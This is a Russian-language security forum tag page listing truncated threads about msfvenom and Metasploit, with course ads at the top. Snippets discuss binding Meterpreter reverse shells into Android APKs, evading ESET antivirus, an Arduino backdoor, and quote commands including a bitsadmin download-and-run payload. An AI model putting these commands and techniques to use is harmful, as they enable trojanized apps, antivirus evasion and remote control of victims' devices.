• 4 июля стартует курс «Python для Пентестера ©» от команды The Codeby

    Понятные и наглядные учебные материалы с информацией для выполнения ДЗ; Проверка ДЗ вручную – наставник поможет улучшить написанный вами код; Помощь преподавателей при выполнении заданий или в изучении теории; Групповой чат в Telegram с другими учениками, проходящими курс; Опытные разработчики – команда Codeby School, лидер по информационной безопасности в RU-сегменте

    Запись на курс до 15 июля. Подробнее ...

  • 11 июля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 20 июля. Подробнее ...

msfvenom

  1. S

    [msfvenom encoders] Нехватка материала

    Приветствую) Изучая энкодеры msfvenom столкнулся с проблемой нехватки информации про принцип их работы. К примеру энкодер x86/nonupper. Стоит цель проанализировать принцип его работы (как происходит обфускация) методом дизассемблирования бинарника с обычным текстом подверженным обфускации...
  2. InetTester

    Циклический запуск модуля persistence_exe в metasploit после ребута удаленной системы

    День добрый, Буду очень благодарен если кто то подскажет как решить данную проблемму. имееться exploit/multi/handler на который успешно прилетают коннекты с удаленных систем сервер: use exploit/multi/handler set AUTORUNSCRIPT multi_console_command -r /root/cmd.rc set payload...
  3. Matthew Tsyb

    как в arduino uno прошить так что бы при подключении запускался msf

    Как прошить в arduino uno backdoor который при подключении к пк запускал метасплоит созданный через MSFVenom
  4. N

    Помогите с msfvenom

    Всем доброго времени суток. Недавно установил metasploit на termux и вроде все работает. Так дело в том что я хотел добавить payload в другую программу. Ну и написал это: Помогите мне с этой ошибкой. Или может я где то ошибся?
  5. alice_killer

    Payload Bypassing Eset

    Здравствуйте, попробовала создать пэйлойд используя Msfvenom и зашифровала шифром ShikatGaNai, в общем смогла скрыть от Avast, но ESET жестко палит, собственно прошу вас ответить на следующий вопрос: как скрыть пэйлоуд от антивируса ESET? если можно опишите пожалуйста более подробно. P.S...
  6. Jony

    Metasploit Frameworke

    Здравствуйте, msf останавливается в данном моменте, и ничего не происходит. Пробовал на нескольких телефонах, приложение apk 100% запущено и работает, нот как видите подключение не происходит, в чем может быть дело?
  7. cr1pt0n

    msfvenom и apk

    Здравствуйте ребята. Создал пэйлоад для андроида с помощью msfvenom(склеил пейлоад к другому apk). msfvenom -x original.apk -p android/meterpeter/reverset_tcp LHOST=ip LPORT=ip -o apk Но при установке приложение никаких разрешений не спрашивает. То есть у него вообще нету привилегий. Разобрал...
  8. pp11

    Помогите разобраться с кодом Python

    Всем привет. Решил немного поковырять msfvenom. Сделал пэйлоад python/meterpreter/reverse_tcp С зашифрованной частью всё примерно ясно. Но вот с не зашифрованной есть вопросы. Как после запуска билда python3 build.py он запускается и пропадает? То есть в процессах он остается, но консоль...
  9. PresetX

    Metasploit отказывается работать с сессией.

    Проблема на скрине. Любые коннекты заканчиваются либо бесконечной загрузкой пейлоада, либо таймаут консольных команд. ip белый, порты проброшены через роутер. Пробовал разные порты. Пробовал 0.0.0.0 и 192.168.х.х. Пробовал reverse_tcp и reverse_http Собирал шеллтером, встроенным веномом...
  10. F

    Склейка Metasploit payload с apk

    Доброго времени суток всем! На днях поставил Metasploit в Termux. При попытке добавить payload в уже существующий apk Metasploit пожаловался на отсутствие Zipalign. Нашёл много разных версий, но под aarch64 не было не одной. Буду благодарен за помощь в решении данного вопроса.
  11. The Codeby

    Soft Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android

    Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload. Установка и использование msfvenom payload: 1. Запустите kali...
  12. Lisenok

    Верная команда для windows/64/exec

    Всем доброго времени, при генерирование нагрузки в msfvenom , пэйлоадом windows/x64/exec с параметрами cmd="bitsadmin /transfer myjob /download /priority high https://mylink.com c:\myfile.exe&start myfile.exe" -f exe -o file.exe, при запуске на windows 10 x64, на доли секунды открывается окошко...
  13. S

    msfvenom вне локалки

    Эксперементирую с троянами в кали, инетересно как оно будет работать к условиям максимально приближенным к "боевым". Есть 2 компа, оба за натом. Хочу настроить на них соеденение + так чтоб было анонимно. Пока пришел к такому: Кали работающая через whonix gateway (поидее никаких утечек...
  14. Vander

    Статья Python-скрипт Pypayload

    Приветствую! В этой небольшой статье я хочу показать небольшой скрипт, написанный на языке Python. Целью его является автоматизация процесса создания полезных нагрузок с помощью Msfvenom. Мне он многократно пригождался для использования с Raspberry PI, в походных условиях, когда полезную...
  15. veterok

    Взлом android: msfvenom -p android/...

    Основу взял тут. Предварительно пробросил 443 порт на роутере. Создал АРК msfvenom -p android/meterpreter/reverse_https LHOST=****.hldns.ru LPORT=443 R > example.apk Затем создал подпись keytool -genkey -v -keystore release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity...